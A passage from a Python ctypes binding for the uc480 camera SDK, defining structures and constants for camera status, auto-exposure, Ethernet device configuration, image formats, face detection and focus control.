:var UC480_CAMERA_INFO[dwCount] uci: List of camera info structures.
"""
class UC480_CAMERA_LIST(ctypes.Structure):
_fields_ = [("dwCount", wt.ULONG),
("uci", UC480_CAMERA_INFO * dwCount)]
a_list = UC480_CAMERA_LIST()
a_list.dwCount = dwCount
return a_list
# ----------------------------------------------------------------------------
# the following defines are the status bits of the dwStatus member of
# the UC480_CAMERA_INFO structure
FIRMWARE_DOWNLOAD_NOT_SUPPORTED = 0x00000001
INTERFACE_SPEED_NOT_SUPPORTED = 0x00000002
INVALID_SENSOR_DETECTED = 0x00000004
AUTHORIZATION_FAILED = 0x00000008
DEVSTS_INCLUDED_STARTER_FIRMWARE_INCOMPATIBLE = 0x00000010
# the following macro determines the availability of the camera based
# on the status flags
def IS_CAMERA_AVAILABLE(_s_):
return ( (((_s_) & FIRMWARE_DOWNLOAD_NOT_SUPPORTED) == 0)
and (((_s_) & INTERFACE_SPEED_NOT_SUPPORTED) == 0)
and (((_s_) & INVALID_SENSOR_DETECTED) == 0)
and (((_s_) & AUTHORIZATION_FAILED) == 0) )
# ----------------------------------------------------------------------------
# auto feature structs and definitions
# ----------------------------------------------------------------------------
AC_SHUTTER = 0x00000001
AC_GAIN = 0x00000002
AC_WHITEBAL = 0x00000004
AC_WB_RED_CHANNEL = 0x00000008
AC_WB_GREEN_CHANNEL = 0x00000010
AC_WB_BLUE_CHANNEL = 0x00000020
AC_FRAMERATE = 0x00000040
AC_SENSOR_SHUTTER = 0x00000080
AC_SENSOR_GAIN = 0x00000100
AC_SENSOR_GAIN_SHUTTER = 0x00000200
AC_SENSOR_FRAMERATE = 0x00000400
AC_SENSOR_WB = 0x00000800
AC_SENSOR_AUTO_REFERENCE = 0x00001000
AC_SENSOR_AUTO_SPEED = 0x00002000
AC_SENSOR_AUTO_HYSTERESIS= 0x00004000
AC_SENSOR_AUTO_SKIPFRAMES= 0x00008000
ACS_ADJUSTING = 0x00000001
ACS_FINISHED = 0x00000002
ACS_DISABLED = 0x00000004
class AUTO_BRIGHT_STATUS(ctypes.Structure):
"""
:var DWORD curValue:
:var ctypes.c_long curError:
:var DWORD curController:
:var DWORD curCtrlStatus:
"""
_fields_ = [("curValue", wt.DWORD),
("curError", ctypes.c_long),
("curController", wt.DWORD),
("curCtrlStatus", wt.DWORD)]
class AUTO_WB_CHANNNEL_STATUS(ctypes.Structure):
"""
:var DWORD curValue:
:var ctypes.c_long curError:
:var DWORD curCtrlStatus:
"""
_fields_ = [("curValue", wt.DWORD),
("curError", ctypes.c_long),
("curCtrlStatus", wt.DWORD)]
class AUTO_WB_STATUS(ctypes.Structure):
"""
:var AUTO_WB_CHANNNEL_STATUS RedChannel:
:var AUTO_WB_CHANNNEL_STATUS GreenChannel:
:var AUTO_WB_CHANNNEL_STATUS BlueChannel:
:var DWORD curController:
"""
_fields_ = [("RedChannel", AUTO_WB_CHANNNEL_STATUS),
("GreenChannel", AUTO_WB_CHANNNEL_STATUS),
("BlueChannel", AUTO_WB_CHANNNEL_STATUS),
("curController", wt.DWORD)]
class UC480_AUTO_INFO(ctypes.Structure):
"""
:var DWORD AutoAbility:
:var AUTO_BRIGHT_STATUS sBrightCtrlStatus:
:var AUTO_WB_STATUS sWBCtrlStatus:
:var DWORD AShutterPhotomCaps:
:var DWORD AGainPhotomCaps:
:var DWORD AAntiFlickerCaps:
:var DWORD SensorWBModeCaps:
:var DWORD[8] reserved:
"""
_fields_ = [("AutoAbility", wt.DWORD),
("sBrightCtrlStatus", AUTO_BRIGHT_STATUS),
("sWBCtrlStatus", AUTO_WB_STATUS),
("AShutterPhotomCaps", wt.DWORD),
("AGainPhotomCaps", wt.DWORD),
("AAntiFlickerCaps", wt.DWORD),
("SensorWBModeCaps", wt.DWORD),
("reserved", wt.DWORD * 8)]
class UC480_AUTO_INFO(ctypes.Structure):
"""
:var ctypes.c_uint nSize:
:var ctypes.c_void_p hDC:
:var ctypes.c_uint nCx:
:var ctypes.c_uint nCy:
"""
_fields_ = [("nSize", ctypes.c_uint),
("hDC", ctypes.c_void_p),
("nCx", ctypes.c_uint),
("nCy", ctypes.c_uint)]
class KNEEPOINT(ctypes.Structure):
"""
:var ctypes.c_double x:
:var ctypes.c_double y:
"""
_fields_ = [("x", ctypes.c_double),
("y", ctypes.c_double)]
class KNEEPOINTARRAY(ctypes.Structure):
"""
:var ctypes.c_int NumberOfUsedKneepoints:
:var KNEEPOINT[10] Kneepoint:
"""
_fields_ = [("NumberOfUsedKneepoints", ctypes.c_int),
("Kneepoint", KNEEPOINT * 10)]
class KNEEPOINTINFO(ctypes.Structure):
"""
:var ctypes.c_int NumberOfSupportedKneepoints:
:var ctypes.c_int NumberOfUsedKneepoints:
:var ctypes.c_double MinValueX:
:var ctypes.c_double MaxValueX:
:var ctypes.c_double MinValueY:
:var ctypes.c_double MaxValueY:
:var KNEEPOINT[10] DefaultKneepoint:
:var ctypes.c_int[10] Reserved:
"""
_fields_ = [("NumberOfSupportedKneepoints", ctypes.c_int),
("NumberOfUsedKneepoints", ctypes.c_int),
("MinValueX", ctypes.c_double),
("MaxValueX", ctypes.c_double),
("MinValueY", ctypes.c_double),
("MaxValueY", ctypes.c_double),
("DefaultKneepoint", KNEEPOINT * 10),
("Reserved", ctypes.c_int * 10)]
IS_SE_STARTER_FW_UPLOAD = 0x00000001 # !< get estimated duration of GigE SE starter firmware upload in milliseconds
IS_CP_STARTER_FW_UPLOAD = 0x00000002 # !< get estimated duration of GigE CP starter firmware upload in milliseconds
IS_STARTER_FW_UPLOAD = 0x00000004 # !< get estimated duration of starter firmware upload in milliseconds using hCam to
class SENSORSCALERINFO(ctypes.Structure):
"""
:var ctypes.c_int nCurrMode:
:var ctypes.c_int nNumberOfSteps:
:var ctypes.c_double dblFactorIncrement:
:var ctypes.c_double dblMinFactor:
:var ctypes.c_double dblMaxFactor:
:var ctypes.c_double dblCurrFactor:
:var ctypes.c_int nSupportedModes:
:var ctypes.c_byte[84] bReserved:
"""
_fields_ = [("nCurrMode", ctypes.c_int),
("nNumberOfSteps", ctypes.c_int),
("dblFactorIncrement", ctypes.c_double),
("dblMinFactor", ctypes.c_double),
("dblMaxFactor", ctypes.c_double),
("dblCurrFactor", ctypes.c_double),
("nSupportedModes", ctypes.c_int),
("bReserved", ctypes.c_byte * 84)]
class UC480TIME(ctypes.Structure):
"""
:var WORD wYear:
:var WORD wMonth:
:var WORD wDay:
:var WORD wHour:
:var WORD wMinute:
:var WORD wSecond:
:var WORD wMilliseconds:
:var BYTE[10] byReserved:
"""
_fields_ = [("wYear", wt.WORD),
("wMonth", wt.WORD),
("wDay", wt.WORD),
("wHour", wt.WORD),
("wMinute", wt.WORD),
("wSecond", wt.WORD),
("wMilliseconds", wt.WORD),
("byReserved", wt.BYTE * 10)]
class UC480IMAGEINFO(ctypes.Structure):
"""
:var DWORD dwFlags:
:var BYTE[4] byReserved1:
:var ctypes.c_ulonglong u64TimestampDevice:
:var UC480TIME TimestampSystem:
:var DWORD dwIoStatus:
:var WORD wAOIIndex:
:var WORD wAOICycle:
:var ctypes.c_ulonglong u64FrameNumber:
:var DWORD dwImageBuffers:
:var DWORD dwImageBuffersInUse:
:var DWORD dwReserved3:
:var DWORD dwImageHeight:
:var DWORD dwImageWidth:
"""
_fields_ = [("dwFlags", wt.DWORD),
("byReserved1", wt.BYTE * 4),
("u64TimestampDevice", ctypes.c_ulonglong),
("TimestampSystem", UC480TIME),
("dwIoStatus", wt.DWORD),
("wAOIIndex", wt.WORD),
("wAOICycle", wt.WORD),
("u64FrameNumber", ctypes.c_ulonglong),
("dwImageBuffers", wt.DWORD),
("dwImageBuffersInUse", wt.DWORD),
("dwReserved3", wt.DWORD),
("dwImageHeight", wt.DWORD),
("dwImageWidth", wt.DWORD)]
# ----------------------------------------------------------------------------
# new functions and datatypes only valid for uc480 ETH
# ----------------------------------------------------------------------------
class UC480_ETH_ADDR_IPV4_by(ctypes.Structure):
"""
:var BYTE by1:
:var BYTE by2:
:var BYTE by3:
:var BYTE by4:
"""
_fields_ = [("by1", wt.BYTE),
("by2", wt.BYTE),
("by3", wt.BYTE),
("by4", wt.BYTE)]
class UC480_ETH_ADDR_IPV4(ctypes.Structure):
"""
:var UC480_ETH_ADDR_IPV4_by by:
:var DWORD dwAddr:
"""
_fields_ = [("by", UC480_ETH_ADDR_IPV4_by),
("dwAddr", wt.DWORD)]
class UC480_ETH_ADDR_MAC(ctypes.Structure):
"""
:var BYTE[6] abyOctet:
"""
_fields_ = [("abyOctet", wt.BYTE * 6)]
class UC480_ETH_IP_CONFIGURATION(ctypes.Structure):
"""
:var UC480_ETH_ADDR_IPV4 ipAddress:
:var UC480_ETH_ADDR_IPV4 ipSubnetmask:
:var BYTE reserved:
"""
_fields_ = [("ipAddress", UC480_ETH_ADDR_IPV4),
("ipSubnetmask", UC480_ETH_ADDR_IPV4),
("reserved", wt.BYTE)]
IS_ETH_DEVSTATUS_READY_TO_OPERATE= 0x00000001 # !< device is ready to operate
IS_ETH_DEVSTATUS_TESTING_IP_CURRENT= 0x00000002 # !< device is (arp-)probing its current ip
IS_ETH_DEVSTATUS_TESTING_IP_PERSISTENT= 0x00000004 # !< device is (arp-)probing its persistent ip
IS_ETH_DEVSTATUS_TESTING_IP_RANGE= 0x00000008 # !< device is (arp-)probing the autocfg ip range
IS_ETH_DEVSTATUS_INAPPLICABLE_IP_CURRENT= 0x00000010 # !< current ip is inapplicable
IS_ETH_DEVSTATUS_INAPPLICABLE_IP_PERSISTENT= 0x00000020 # !< persistent ip is inapplicable
IS_ETH_DEVSTATUS_INAPPLICABLE_IP_RANGE= 0x00000040 # !< autocfg ip range is inapplicable
IS_ETH_DEVSTATUS_UNPAIRED= 0x00000100 # !< device is unpaired
IS_ETH_DEVSTATUS_PAIRING_IN_PROGRESS= 0x00000200 # !< device is being paired
IS_ETH_DEVSTATUS_PAIRED= 0x00000400 # !< device is paired
IS_ETH_DEVSTATUS_FORCE_100MBPS= 0x00001000 # !< device phy is configured to 100 Mbps
IS_ETH_DEVSTATUS_NO_COMPORT= 0x00002000 # !< device does not support uc480 eth comport
IS_ETH_DEVSTATUS_RECEIVING_FW_STARTER= 0x00010000 # !< device is receiving the starter firmware
IS_ETH_DEVSTATUS_RECEIVING_FW_RUNTIME= 0x00020000 # !< device is receiving the runtime firmware
IS_ETH_DEVSTATUS_INAPPLICABLE_FW_RUNTIME= 0x00040000 # !< runtime firmware is inapplicable
IS_ETH_DEVSTATUS_INAPPLICABLE_FW_STARTER= 0x00080000 # !< starter firmware is inapplicable
IS_ETH_DEVSTATUS_REBOOTING_FW_RUNTIME= 0x00100000 # !< device is rebooting to runtime firmware
IS_ETH_DEVSTATUS_REBOOTING_FW_STARTER= 0x00200000 # !< device is rebooting to starter firmware
IS_ETH_DEVSTATUS_REBOOTING_FW_FAILSAFE= 0x00400000 # !< device is rebooting to failsafe firmware
IS_ETH_DEVSTATUS_RUNTIME_FW_ERR0= 0x80000000 # !< checksum error runtime firmware
# heartbeat info transmitted periodically by a device
# contained in UC480_ETH_DEVICE_INFO
class UC480_ETH_DEVICE_INFO_HEARTBEAT(ctypes.Structure):
"""
:var BYTE[12] abySerialNumber:
:var BYTE byDeviceType:
:var BYTE byCameraID:
:var WORD wSensorID:
:var WORD wSizeImgMem_MB:
:var BYTE[2] reserved_1:
:var DWORD dwVerStarterFirmware:
:var DWORD dwVerRuntimeFirmware:
:var DWORD dwStatus:
:var BYTE[4] reserved_2:
:var WORD wTemperature:
:var WORD wLinkSpeed_Mb:
:var UC480_ETH_ADDR_MAC macDevice:
:var WORD wComportOffset:
:var UC480_ETH_IP_CONFIGURATION ipcfgPersistentIpCfg:
:var UC480_ETH_IP_CONFIGURATION ipcfgCurrentIpCfg:
:var UC480_ETH_ADDR_MAC macPairedHost:
:var BYTE[2] reserved_4:
:var UC480_ETH_ADDR_IPV4 ipPairedHostIp:
:var UC480_ETH_ADDR_IPV4 ipAutoCfgIpRangeBegin:
:var UC480_ETH_ADDR_IPV4 ipAutoCfgIpRangeEnd:
:var BYTE[8] abyUserSpace:
:var BYTE[84] reserved_5:
:var BYTE[64] reserved_6:
"""
_fields_ = [("abySerialNumber", wt.BYTE * 12),
("byDeviceType", wt.BYTE),
("byCameraID", wt.BYTE),
("wSensorID", wt.WORD),
("wSizeImgMem_MB", wt.WORD),
("reserved_1", wt.BYTE * 2),
("dwVerStarterFirmware", wt.DWORD),
("dwVerRuntimeFirmware", wt.DWORD),
("dwStatus", wt.DWORD),
("reserved_2", wt.BYTE * 4),
("wTemperature", wt.WORD),
("wLinkSpeed_Mb", wt.WORD),
("macDevice", UC480_ETH_ADDR_MAC),
("wComportOffset", wt.WORD),
("ipcfgPersistentIpCfg", UC480_ETH_IP_CONFIGURATION),
("ipcfgCurrentIpCfg", UC480_ETH_IP_CONFIGURATION),
("macPairedHost", UC480_ETH_ADDR_MAC),
("reserved_4", wt.BYTE * 2),
("ipPairedHostIp", UC480_ETH_ADDR_IPV4),
("ipAutoCfgIpRangeBegin", UC480_ETH_ADDR_IPV4),
("ipAutoCfgIpRangeEnd", UC480_ETH_ADDR_IPV4),
("abyUserSpace", wt.BYTE * 8),
("reserved_5", wt.BYTE * 84),
("reserved_6", wt.BYTE * 64)]
IS_ETH_CTRLSTATUS_AVAILABLE= 0x00000001 # !< device is available TO US
IS_ETH_CTRLSTATUS_ACCESSIBLE1= 0x00000002 # !< device is accessible BY US, i.e. directly 'unicastable'
IS_ETH_CTRLSTATUS_ACCESSIBLE2= 0x00000004 # !< device is accessible BY US, i.e. not on persistent ip and adapters ip autocfg range is valid
IS_ETH_CTRLSTATUS_PERSISTENT_IP_USED= 0x00000010 # !< device is running on persistent ip configuration
IS_ETH_CTRLSTATUS_COMPATIBLE= 0x00000020 # !< device is compatible TO US
IS_ETH_CTRLSTATUS_ADAPTER_ON_DHCP= 0x00000040 # !< adapter is configured to use dhcp
IS_ETH_CTRLSTATUS_ADAPTER_SETUP_OK = 0x00000080 # !< adapter's setup is ok with respect to uc480 needs
IS_ETH_CTRLSTATUS_UNPAIRING_IN_PROGRESS= 0x00000100 # !< device is being unpaired FROM US
IS_ETH_CTRLSTATUS_PAIRING_IN_PROGRESS= 0x00000200 # !< device is being paired TO US
IS_ETH_CTRLSTATUS_PAIRED= 0x00001000 # !< device is paired TO US
IS_ETH_CTRLSTATUS_OPENED = 0x00004000 # !< device is opened BY SELF
IS_ETH_CTRLSTATUS_FW_UPLOAD_STARTER= 0x00010000 # !< device is receiving the starter firmware
IS_ETH_CTRLSTATUS_FW_UPLOAD_RUNTIME= 0x00020000 # !< device is receiving the runtime firmware
IS_ETH_CTRLSTATUS_REBOOTING= 0x00100000 # !< device is rebooting
IS_ETH_CTRLSTATUS_BOOTBOOST_ENABLED = 0x01000000 # !< boot-boosting is enabled for this device
IS_ETH_CTRLSTATUS_BOOTBOOST_ACTIVE = 0x02000000 # !< boot-boosting is active for this device
IS_ETH_CTRLSTATUS_INITIALIZED= 0x08000000 # !< device object is initialized
IS_ETH_CTRLSTATUS_TO_BE_DELETED= 0x40000000 # !< device object is being deleted
IS_ETH_CTRLSTATUS_TO_BE_REMOVED= 0x80000000 # !< device object is being removed
class UC480_ETH_DEVICE_INFO_CONTROL(ctypes.Structure):
"""
:var DWORD dwDeviceID:
:var DWORD dwControlStatus:
:var BYTE[80] reserved_1:
:var BYTE[64] reserved_2:
"""
_fields_ = [("dwDeviceID", wt.DWORD),
("dwControlStatus", wt.DWORD),
("reserved_1", wt.BYTE * 80),
("reserved_2", wt.BYTE * 64)]
class UC480_ETH_ETHERNET_CONFIGURATION(ctypes.Structure):
"""
:var UC480_ETH_IP_CONFIGURATION ipcfg:
:var UC480_ETH_ADDR_MAC mac:
"""
_fields_ = [("ipcfg", UC480_ETH_IP_CONFIGURATION),
("mac", UC480_ETH_ADDR_MAC)]
class UC480_ETH_AUTOCFG_IP_SETUP(ctypes.Structure):
"""
:var UC480_ETH_ADDR_IPV4 ipAutoCfgIpRangeBegin:
:var UC480_ETH_ADDR_IPV4 ipAutoCfgIpRangeEnd:
:var BYTE[4] reserved:
"""
_fields_ = [("ipAutoCfgIpRangeBegin", UC480_ETH_ADDR_IPV4),
("ipAutoCfgIpRangeEnd", UC480_ETH_ADDR_IPV4),
("reserved", wt.BYTE * 4)]
# values for incoming packets filter setup
IS_ETH_PCKTFLT_PASSALL= 0 # !< pass all packets to OS
IS_ETH_PCKTFLT_BLOCKUEGET= 1 # !< block UEGET packets to the OS
IS_ETH_PCKTFLT_BLOCKALL= 2 # !< block all packets to the OS
# values for link speed setup
IS_ETH_LINKSPEED_100MB= 100 # !< 100 MBits
IS_ETH_LINKSPEED_1000MB= 1000 # !< 1000 MBits
# control info for a device's network adapter
# contained in UC480_ETH_DEVICE_INFO
class UC480_ETH_ADAPTER_INFO(ctypes.Structure):
"""
:var DWORD dwAdapterID:
:var DWORD dwDeviceLinkspeed:
:var UC480_ETH_ETHERNET_CONFIGURATION ethcfg:
:var BYTE[2] reserved_2:
:var BOOL bIsEnabledDHCP:
:var UC480_ETH_AUTOCFG_IP_SETUP autoCfgIp:
:var BOOL bIsValidAutoCfgIpRange:
:var DWORD dwCntDevicesKnown:
:var DWORD dwCntDevicesPaired:
:var WORD wPacketFilter:
:var BYTE[38] reserved_3:
:var BYTE[64] reserved_4:
"""
_fields_ = [("dwAdapterID", wt.DWORD),
("dwDeviceLinkspeed", wt.DWORD),
("ethcfg", UC480_ETH_ETHERNET_CONFIGURATION),
("reserved_2", wt.BYTE * 2),
("bIsEnabledDHCP", wt.BOOL),
("autoCfgIp", UC480_ETH_AUTOCFG_IP_SETUP),
("bIsValidAutoCfgIpRange", wt.BOOL),
("dwCntDevicesKnown", wt.DWORD),
("dwCntDevicesPaired", wt.DWORD),
("wPacketFilter", wt.WORD),
("reserved_3", wt.BYTE * 38),
("reserved_4", wt.BYTE * 64)]
# driver info
# contained in UC480_ETH_DEVICE_INFO
class UC480_ETH_DRIVER_INFO(ctypes.Structure):
"""
:var DWORD dwMinVerStarterFirmware:
:var DWORD dwMaxVerStarterFirmware:
:var BYTE[8] reserved_1:
:var BYTE[64] reserved_2:
"""
_fields_ = [("dwMinVerStarterFirmware", wt.DWORD),
("dwMaxVerStarterFirmware", wt.DWORD),
("reserved_1", wt.BYTE * 8),
("reserved_2", wt.BYTE * 64)]
# use is_GetEthDeviceInfo() to obtain this data.
class UC480_ETH_DEVICE_INFO(ctypes.Structure):
"""
:var UC480_ETH_DEVICE_INFO_HEARTBEAT infoDevHeartbeat:
:var UC480_ETH_DEVICE_INFO_CONTROL infoDevControl:
:var UC480_ETH_ADAPTER_INFO infoAdapter:
:var UC480_ETH_DRIVER_INFO infoDriver:
"""
_fields_ = [("infoDevHeartbeat", UC480_ETH_DEVICE_INFO_HEARTBEAT),
("infoDevControl", UC480_ETH_DEVICE_INFO_CONTROL),
("infoAdapter", UC480_ETH_ADAPTER_INFO),
("infoDriver", UC480_ETH_DRIVER_INFO)]
class UC480_COMPORT_CONFIGURATION(ctypes.Structure):
"""
:var WORD wComportNumber:
"""
_fields_ = [("wComportNumber", wt.WORD)]
class IS_DEVICE_INFO_HEARTBEAT(ctypes.Structure):
"""
:var BYTE[24] reserved_1:
:var DWORD dwRuntimeFirmwareVersion:
:var BYTE[8] reserved_2:
:var WORD wTemperature:
:var WORD wLinkSpeed_Mb:
:var BYTE[6] reserved_3:
:var WORD wComportOffset:
:var BYTE[200] reserved:
"""
_fields_ = [("reserved_1", wt.BYTE * 24),
("dwRuntimeFirmwareVersion", wt.DWORD),
("reserved_2", wt.BYTE * 8),
("wTemperature", wt.WORD),
("wLinkSpeed_Mb", wt.WORD),
("reserved_3", wt.BYTE * 6),
("wComportOffset", wt.WORD),
("reserved", wt.BYTE * 200)]
class IS_DEVICE_INFO_CONTROL(ctypes.Structure):
"""
:var DWORD dwDeviceId:
:var BYTE[146] reserved:
"""
_fields_ = [("dwDeviceId", wt.DWORD),
("reserved", wt.BYTE * 148)]
class IS_DEVICE_INFO(ctypes.Structure):
"""
:var IS_DEVICE_INFO_HEARTBEAT infoDevHeartbeat:
:var IS_DEVICE_INFO_CONTROL infoDevControl:
:var BYTE[240] reserved:
"""
_fields_ = [("infoDevHeartbeat", IS_DEVICE_INFO_HEARTBEAT),
("infoDevControl", IS_DEVICE_INFO_CONTROL),
("reserved", wt.BYTE * 240)]
IS_DEVICE_INFO_CMD_GET_DEVICE_INFO = 0x02010001
class OPENGL_DISPLAY(ctypes.Structure):
"""
:var ctypes.c_int nWindowID:
:var ctypes.c_void_p pDisplay:
"""
_fields_ = [("nWindowID", ctypes.c_int),
("pDisplay", ctypes.c_void_p)]
IMGFRMT_CMD_GET_NUM_ENTRIES = 1 # Get the number of supported image formats.
# pParam hast to be a Pointer to IS_U32. If -1 is reported, the device
# supports continuous AOI settings (maybe with fixed increments)
IMGFRMT_CMD_GET_LIST = 2 # Get a array of IMAGE_FORMAT_ELEMENTs.
IMGFRMT_CMD_SET_FORMAT = 3 # Select a image format
IMGFRMT_CMD_GET_ARBITRARY_AOI_SUPPORTED = 4 # Does the device supports the setting of an arbitrary AOI.
IMGFRMT_CMD_GET_FORMAT_INFO = 5 # Get IMAGE_FORMAT_INFO for a given formatID
# no trigger
CAPTMODE_FREERUN = 0x00000001
CAPTMODE_SINGLE = 0x00000002
# software trigger modes
CAPTMODE_TRIGGER_SOFT_SINGLE = 0x00000010
CAPTMODE_TRIGGER_SOFT_CONTINUOUS = 0x00000020
# hardware trigger modes
CAPTMODE_TRIGGER_HW_SINGLE = 0x00000100
CAPTMODE_TRIGGER_HW_CONTINUOUS = 0x00000200
class IMAGE_FORMAT_INFO(ctypes.Structure):
"""
:var INT nFormatID:
:var UINT nWidth:
:var UINT nHeight:
:var INT nX0:
:var INT nY0:
:var UINT nSupportedCaptureModes:
:var UINT nBinningMode:
:var UINT nSubsamplingMode:
:var ctypes.c_char[64] strFormatName:
:var ctypes.c_double dSensorScalerFactor:
:var UINT[22] nReserved:
"""
_fields_ = [("nFormatID", wt.INT),
("nWidth", wt.UINT),
("nHeight", wt.UINT),
("nX0", wt.INT),
("nY0", wt.INT),
("nSupportedCaptureModes", wt.UINT),
("nBinningMode", wt.UINT),
("nSubsamplingMode", wt.UINT),
("strFormatName", ctypes.c_char * 64),
("dSensorScalerFactor", ctypes.c_double),
("nReserved", wt.UINT * 22)]
# class IMAGE_FORMAT_LIST(ctypes.Structure):
# _fields_ = [("nSizeOfListEntry", wt.UINT),
# ("nNumListElements", wt.UINT),
# ("nReserved", wt.UINT * 4),
# ("FormatInfo", ctypes.POINTER(IMAGE_FORMAT_INFO))]
def create_image_format_list(nNumListElements):
"""Returns an instance of the IMAGE_FORMAT_LIST structure having the properly scaled *FormatInfo* array.
:param ULONG nNumListElements: Number of format info structures requested.
:returns: IMAGE_FORMAT_LIST
:var UINT nSizeOfListEntry:
:var UINT nNumListElements:
:var UINT[4] nReserved:
:var IMAGE_FORMAT_INFO[nNumListElements] FormatInfo:
"""
class IMAGE_FORMAT_LIST(ctypes.Structure):
_fields_ = [("nSizeOfListEntry", wt.UINT),
("nNumListElements", wt.UINT),
("nReserved", wt.UINT * 4),
("FormatInfo", IMAGE_FORMAT_INFO * nNumListElements)]
a_list = IMAGE_FORMAT_LIST()
a_list.nNumListElements = nNumListElements
return a_list
FDT_CAP_INVALID = 0
FDT_CAP_SUPPORTED = 0x00000001 # Face detection supported.
FDT_CAP_SEARCH_ANGLE = 0x00000002 # Search angle.
FDT_CAP_SEARCH_AOI = 0x00000004 # Search AOI.
FDT_CAP_INFO_POSX = 0x00000010 # Query horizontal position (center) of detected face.
FDT_CAP_INFO_POSY = 0x00000020 # Query vertical position(center) of detected face.
FDT_CAP_INFO_WIDTH = 0x00000040 # Query width of detected face.
FDT_CAP_INFO_HEIGHT = 0x00000080 # Query height of detected face.
FDT_CAP_INFO_ANGLE = 0x00000100 # Query angle of detected face.
FDT_CAP_INFO_POSTURE = 0x00000200 # Query posture of detected face.
FDT_CAP_INFO_FACENUMBER = 0x00000400 # Query number of detected faces.
FDT_CAP_INFO_OVL = 0x00000800 # Overlay: Mark the detected face in the image.
FDT_CAP_INFO_NUM_OVL = 0x00001000 # Overlay: Limit the maximum number of overlays in one image.
FDT_CAP_INFO_OVL_LINEWIDTH = 0x00002000 # Overlay line width.
class FDT_INFO_EL(ctypes.Structure):
"""
:var INT nFacePosX:
:var INT nFacePosY:
:var INT nFaceWidth:
:var INT nFaceHeight:
:var INT nAngle:
:var UINT nPosture:
:var UC480TIME TimestampSystem:
:var ctypes.c_ulonglong nReserved:
:var UINT[4] nReserved2:
"""
_fields_ = [("nFacePosX", wt.INT),
("nFacePosY", wt.INT),
("nFaceWidth", wt.INT),
("nFaceHeight", wt.INT),
("nAngle", wt.INT),
("nPosture", wt.UINT),
("TimestampSystem", UC480TIME),
("nReserved", ctypes.c_ulonglong),
("nReserved2", wt.UINT * 4)]
# class FDT_INFO_LIST(ctypes.Structure):
# _fields_ = [("nSizeOfListEntry", wt.UINT),
# ("nNumDetectedFaces", wt.UINT),
# ("nNumListElements", wt.UINT),
# ("nReserved", wt.UINT * 4),
# ("FaceEntry", ctypes.POINTER(FDT_INFO_EL))]
def create_fdt_info_list(nNumListElements):
"""Returns an instance of the FDT_INFO_LIST structure having the properly scaled *FaceEntry* array.
:param ULONG nNumListElements: Number of face entry structures requested.
:returns: FDT_INFO_LIST
:var UINT nSizeOfListEntry:
:var UINT nNumDetectedFaces:
:var UINT nNumListElements:
:var UINT[4] nReserved:
:var FDT_INFO_EL[nNumListElements] FaceEntry:
"""
class FDT_INFO_LIST(ctypes.Structure):
_fields_ = [("nSizeOfListEntry", wt.UINT),
("nNumDetectedFaces", wt.UINT),
("nNumListElements", wt.UINT),
("nReserved", wt.UINT * 4),
("FaceEntry", FDT_INFO_EL * nNumListElements)]
a_list = FDT_INFO_LIST()
a_list.nNumListElements = nNumListElements
return a_list
FDT_CMD_GET_CAPABILITIES = 0 # Get the capabilities for face detection.
FDT_CMD_SET_DISABLE = 1 # Disable face detection.
FDT_CMD_SET_ENABLE = 2 # Enable face detection.
FDT_CMD_SET_SEARCH_ANGLE = 3 # Set the search angle.
FDT_CMD_GET_SEARCH_ANGLE = 4 # Get the search angle parameter.
FDT_CMD_SET_SEARCH_ANGLE_ENABLE = 5 # Enable search angle.
FDT_CMD_SET_SEARCH_ANGLE_DISABLE= 6 # Enable search angle.
FDT_CMD_GET_SEARCH_ANGLE_ENABLE = 7 # Get the current setting of search angle enable.
FDT_CMD_SET_SEARCH_AOI = 8 # Set the search AOI.
FDT_CMD_GET_SEARCH_AOI = 9 # Get the search AOI.
FDT_CMD_GET_FACE_LIST = 10 # Get a list with detected faces.
FDT_CMD_GET_NUMBER_FACES = 11 # Get the number of detected faces.
FDT_CMD_SET_SUSPEND = 12 # Keep the face detection result of that moment.
FDT_CMD_SET_RESUME = 13 # Continue with the face detection.
FDT_CMD_GET_MAX_NUM_FACES = 14 # Get the maximum number of faces that can be detected once.
FDT_CMD_SET_INFO_MAX_NUM_OVL = 15 # Set the maximum number of overlays displayed.
FDT_CMD_GET_INFO_MAX_NUM_OVL = 16 # Get the setting 'maximum number of overlays displayed'.
FDT_CMD_SET_INFO_OVL_LINE_WIDTH = 17 # Set the overlay line width.
FDT_CMD_GET_INFO_OVL_LINE_WIDTH = 18 # Get the overlay line width.
FDT_CMD_GET_ENABLE = 19 # Face detection enabled?.
FDT_CMD_GET_SUSPEND = 20 # Face detection suspended?.
FOC_CAP_INVALID = 0
FOC_CAP_AUTOFOCUS_SUPPORTED = 0x00000001 # Auto focus supported.
FOC_CAP_MANUAL_SUPPORTED = 0x00000002 # Manual focus supported.
FOC_CAP_GET_DISTANCE = 0x00000004 # Support for query the distance of the focused object.
FOC_CAP_SET_AUTOFOCUS_RANGE = 0x00000008 # Support for setting focus ranges.
FOC_RANGE_NORMAL = 0x00000001 # Normal focus range(without Macro).
FOC_RANGE_ALLRANGE = 0x00000002 # Allrange (macro to Infinity).
FOC_RANGE_MACRO = 0x00000004 # Macro (only macro).
FOC_CMD_GET_CAPABILITIES = 0 # Get focus capabilities.
FOC_CMD_SET_DISABLE_AUTOFOCUS = 1 # Disable autofocus.
FOC_CMD_SET_ENABLE_AUTOFOCUS = 2 # Enable autofocus.
FOC_CMD_GET_AUTOFOCUS_ENABLE = 3 # Autofocus enabled?.
FOC_CMD_SET_AUTOFOCUS_RANGE = 4 # Preset autofocus range.
FOC_CMD_GET_AUTOFOCUS_RANGE = 5 # Get preset of autofocus range.
FOC_CMD_GET_DISTANCE = 6 # Get distance to focused object.
FOC_CMD_SET_MANUAL_FOCUS = 7 # Set manual focus.
FOC_CMD_GET_MANUAL_FOCUS = 8 # Get the value for manual focus.
FOC_CMD_GET_MANUAL_FOCUS_MIN = 9 # Get the minimum manual focus value.
FOC_CMD_GET_MANUAL_FOCUS_MAX = 10 # Get the maximum manual focus value.
FOC_CMD_GET_MANUAL_FOCUS_INC = 11 # Get the increment of the manual focus value.
IMGSTAB_CAP_INVALID = 0
IMGSTAB_CAP_IMAGE_STABILIZATION_SUPPORTED = 0x00000001 # Image stabilization supported.
IMGSTAB_CMD_GET_CAPABILITIES = 0 # Get the capabilities for image stabilization.
IMGSTAB_CMD_SET_DISABLE = 1 # Disable image stabilization.
IMGSTAB_CMD_SET_ENABLE = 2 # Enable image stabilization.
IMGSTAB_CMD_GET_ENABLE = 3 # Image stabilization enabled?
SCENE_CMD_GET_SUPPORTED_PRESETS = 1# Get the supported scene presets
SCENE_CMD_SET_PRESET = 2# Set the scene preset
SCENE_CMD_GET_PRESET = 3# Get the current sensor scene preset
